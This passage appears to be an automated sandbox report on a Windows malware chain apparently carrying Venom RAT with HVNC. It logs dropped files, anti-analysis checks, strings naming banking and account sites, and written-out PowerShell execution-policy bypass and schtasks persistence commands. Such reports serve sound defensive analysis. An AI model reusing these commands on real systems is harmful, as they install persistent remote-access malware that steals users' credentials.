curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: pnaclmp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Y\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831hO+ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2#"I source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: Temp\Symbols\ntkrnlmp.pdbD source: curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdba source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: xC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                  Source: curcuma.exe.30.drStatic PE information: real checksum: 0x27934f should be: 0x28b32f
                  Source: ADFoyxP.exeStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
                  Source: curcuma.exe.30.drStatic PE information: section name: .xdata
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003B0315 push cs; retn 003Ah27_2_003B0318
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380DE6 push ecx; ret 27_2_00380DF9
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_06E23680 push es; ret 30_2_06E23730
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7095733 push rdi; iretd 36_2_00007FF7C7095739
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7096B28 push rbx; iretq 36_2_00007FF7C7096B42

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.com
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\curcuma.exe

                  Boot Survival

                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003F26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_003F26DD
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0037FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_0037FC7C
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: Yara match File source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: 1810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: 3500000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: 1870000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Window / User API: threadDelayed 1518
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Window / User API: threadDelayed 3411
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Window / User API: threadDelayed 9786
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2923
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 570
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com API coverage: 4.2 %
                  Source: C:\Users\user\Desktop\ADFoyxP.exe TID: 4652 Thread sleep time: -142692s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7744 Thread sleep count: 3411 > 30
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7744 Thread sleep time: -34110s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 1664 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 7612 Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe TID: 3384 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Last function: Thread delayed
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Thread sleep count: Count: 3411 delay: -10
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_003DA087
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_003DA1E2
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,27_2_003CE472
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,27_2_003DA570
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_0039C622 FindFirstFileExW,27_2_0039C622
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003D66DC FindFirstFileW,FindNextFileW,FindClose,27_2_003D66DC
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003D7333 FindFirstFileW,FindClose,27_2_003D7333
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,27_2_003D73D4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_003CD921
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_003CDC54
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_00365FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,27_2_00365FC8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: RegAsm.exe, 0000001E.00000002.2537902143.0000000005B4F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538485789.0000000005B8D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2537902143.0000000005B32000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2100818963.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2049970543.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2466209800.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2049415707.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
